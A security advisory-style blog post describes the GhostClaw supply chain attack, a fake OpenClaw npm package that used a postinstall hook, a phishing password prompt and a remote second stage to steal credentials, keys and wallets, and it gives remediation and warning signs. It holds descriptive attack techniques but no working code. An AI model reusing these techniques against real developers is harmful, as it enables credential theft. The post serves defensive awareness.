A sophisticated supply chain attack has been quietly compromising developer machines since early March 2026. A malicious npm package named @openclaw-ai/openclawai — masquerading as an installer for the legitimate OpenClaw tool — was spreading a fully-featured remote access trojan dubbed GhostClaw. It had been downloaded 178 times before being pulled from the registry on March 10, 2026.
🎭 How It Fooled Developers
The package was engineered to look trustworthy at every step. It came with a clean package.json, a benign src/index.js export, and no suspicious dependencies — the kind of profile that passes a quick audit without raising flags.
The real damage began with a postinstall hook that silently reinstalled the package globally, planting the openclaw binary on the system PATH. A file called setup.js then launched a convincing fake CLI — complete with animated progress bars — simulating a real installation.
Once the fake install “completed,” users were shown what appeared to be an iCloud Keychain authorization prompt asking for their system password. Crucially, the malware validated the password using the real OS authentication mechanism — meaning wrong passwords were rejected, making the prompt feel completely genuine.
While the user’s attention was on the fake UI, the script was simultaneously fetching an encrypted second-stage payload from a remote C2 server (trackpipe[.]dev), running it as a detached process, and immediately deleting the temp file to cover its tracks.
👻 Meet GhostLoader
The decrypted payload — roughly 11,700 lines of JavaScript — was a complete malware framework called GhostLoader. It buried itself in a hidden directory disguised as a routine npm telemetry service (~/.npm_telemetry/monitor.js) and set up persistence hooks in shell config files so it would automatically relaunch if terminated.
What it stole was staggering in scope:
- 🔑 System passwords and macOS Keychain databases
- ☁️ Cloud credentials (AWS, GCP, Azure config files)
- 🔐 SSH private keys
- 💰 Cryptocurrency wallet files and seed phrases
- 🌐 Browser credentials, cookies, and saved passwords
- 📱 iMessage history and email records
- 🪪 API tokens for OpenAI, Stripe, GitHub, and more
Perhaps the most alarming capability: live browser session cloning. Rather than just stealing credentials, the attacker could duplicate an entire browser profile and run it in a headless environment — effectively impersonating the victim in real time without ever needing a password.
The malware ran on macOS, Linux, and Windows, adapting its credential-harvesting method to each platform. Its C2 infrastructure also included a NUKE command to remotely wipe all evidence of the infection on demand.
🚨 What To Do If You Installed It
If you ran npm install @openclaw-ai/openclawai at any point, treat your machine as fully compromised and act immediately:
- Remove the
~/.npm_telemetrydirectory - Check
~/.zshrc,~/.bashrc, and~/.bash_profilefor injected lines - Kill any running
monitor.jsprocesses - Fully uninstall the package
- Rotate all credentials — system passwords, SSH keys, AWS/GCP/Azure tokens, OpenAI, Stripe, GitHub API keys, and any exposed crypto wallet seed phrases
- Consider a full machine re-image given the depth of the compromise
🛡️ The Broader Lesson
This campaign is a textbook software supply chain attack — patient, polished, and designed to strike exactly when developers are most likely to trust what they’re running.
Going forward, treat any npm package as suspicious if it:
- Requests system credentials at any point
- Uses postinstall scripts to globally install itself
- Fetches remote payloads at install time
When installing OpenClaw or any developer tool, always verify you’re using the official package from confirmed, trusted sources.
Sources: JFrog Security, The Hacker News, Cyber Security News, CSO Online, SOCRadar
Tags: #CyberSecurity #npm #SupplyChainAttack #Malware #DevSecurity
Thanmay Sarath is a Mensa member, ethical hacker, entrepreneur, and technologist passionate about cybersecurity and innovation. A researcher, international speaker, and published author, he works at the intersection of technology, security, and social impact, helping organizations and communities stay safe in an increasingly digital world.